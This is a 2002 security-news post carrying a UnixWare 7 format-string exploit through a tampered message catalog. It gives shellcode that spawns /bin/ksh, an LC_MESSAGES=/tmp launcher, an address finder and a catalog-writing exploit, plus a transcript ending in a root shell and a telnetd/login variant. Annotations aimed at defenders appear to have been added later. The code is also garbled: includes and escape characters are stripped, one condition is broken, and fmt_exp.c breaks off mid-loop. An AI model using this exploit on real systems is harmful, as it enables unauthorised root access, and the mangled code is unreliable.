
Unixware Message catalog exploit code

by Nikola Strahija on February 11th, 2002. This exploit is fixed already. An attacker can modify the message catalog, which makes a format string exploit possible.


$ gcc -o expshell expshell.c
$ gcc -o getret getret.c
$ gcc -o fmt_exp fmt_exp.c
$ ./expshell
$ ./getret
e=8047af7
$ ./fmt_exp 0x8047af7 16 ( 16 is offset )
...........(wait 30 minutes ). ......

# id
uid=0(root) gid=3(sys) ......................

This can exploit every UnixWare 7 setuid/setgid
command.

It can also exploit telnetd and login.

example)
$ telnet
telnet> env def LC_MESSAGES /tmp
telnet> o localhost
Trying....
.....
login: blah blah..
password: blah.. blash..
...... (wait 30 minutes.. )
#

------------------------------------------------
Korean security forum
http://www.forsecure.com
http://www.netemperor.com
------------------------------------------------

Here is the code.

------------------ expshell.c ------------------
#include

/*
 * Payload that main() below exports as the EGG environment variable
 * (historical UnixWare 7 proof of concept; the post states it is already
 * fixed). A long run of x90 bytes (presumably a NOP sled) precedes a short
 * instruction sequence, annotated per byte in the original comments, and
 * the "/bin/ksh" string the literal ends with. The byte escapes appear
 * here exactly as the page extraction rendered them.
 */
char shellcode[]=
"x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90"
"xebx1a" /* jmp */
"x33xd2" /* xorl %edx,%edx */
"x58" /* popl %eax */
"x8dx78x14" /* leal 0x14(%eax),%edi */
"x57" /* pushl %edi */
"x50" /* pushl %eax */
"xab" /* stosl %eax,%es:(%edi) */
"x92" /* xchgl %eax,%edx */
"xab" /* stosl %eax,%es:(%edi) */
"x88x42x08" /* movb %al,0x8(%edx)
*/
"x83xefx3b" /* subl $0x3b,%edi */
"xb0x9a" /* movb $0x9a,%al */
"xab" /* stosl %eax,%es:(%edi) */
"x47" /* incl %edi */
"xb0x07" /* movb $0x07,%al */
"xab" /* stosl %eax,%es:(%edi) */
"xb0x0b" /* movb $0x0b,%al */
"xe8xe1xffxffxff" /* call */
"/bin/ksh"
;

/*
 * Proof-of-concept launcher (historical; the post says the vendor has
 * already fixed the issue). It places the shellcode bytes in the EGG
 * environment variable, sets LC_MESSAGES to /tmp so that a program looks
 * for its message catalog in a directory an unprivileged user can write
 * to, and then starts tcsh so the remaining steps in the post's transcript
 * run with that environment.
 *
 * Defender's notes:
 *  - The root cause is a privileged (setuid/setgid) program trusting a
 *    user-controlled locale path for its message catalog, whose entries
 *    are format strings. The fix is the vendor patch; as general
 *    hardening, privileged programs should not honor locale-related
 *    environment from an untrusted caller (NOTE(review): the exact
 *    UnixWare lookup behavior is not verifiable from this page).
 *  - LC_MESSAGES pointing at a world-writable directory in the environment
 *    of a privileged process is an anomaly worth alerting on.
 *  - sprintf() into the fixed 1024-byte buff is unbounded; the literal
 *    above happens to fit, but nothing checks it.
 *  - No header for sprintf()/putenv()/system() is visible (the #include
 *    line at the top of the listing has lost its argument in extraction)
 *    and main() relies on an implicit int return type: pre-C99 style.
 */
main(int argc, char *argv[])
{
char buff[1024];

sprintf(buff, "EGG=%s", shellcode);
putenv(buff);

putenv("LC_MESSAGES=/tmp");
system("/usr/bin/tcsh");
}
---------------------------------------------------------------

---------------- getret.c --------------------
/*
 * Helper used in the post's transcript: run from the shell that expshell
 * started, it prints the address at which this process finds the EGG
 * environment variable; the transcript then passes that value to fmt_exp
 * as its "ret-address" argument. getenv() returns NULL if EGG is unset
 * and that case is not checked. The format string "e=%pn" is as the page
 * extraction rendered it. No header for getenv()/printf() is included
 * and main() relies on an implicit int return type.
 */
main()
{
char *a;
a = getenv("EGG");
printf ("e=%pn", a);
}
-----------------------------------------------

---------------- fmt_exp.c -----------------------------
#include
#include "shellcode.h"

/* This is the base of the format string return address */
/* Base address of vxprint is 0x20c7c(134268) */
#define BASE 134268

main(int argc, char *argv[])
{
FILE *fp;
char *retaddr;
long g_len, offset;
int count, count2, line=700, n=19;

if(argc 3) {
printf("Usage: %s ret-address offsetn", argv[0]);
exit(1);
}

retaddr = argv[1];
if(argc == 3) offset = atol(argv[2]);
else offset = 0;

g_len = strtol(retaddr, NULL, 16);
g_len -= BASE;
g_len += offset;

fp = fopen("testdef", "w+");
if(fp == NULL) {
fprintf(stderr, "can not open file.n"); exit(1);
}
for(count=0; count

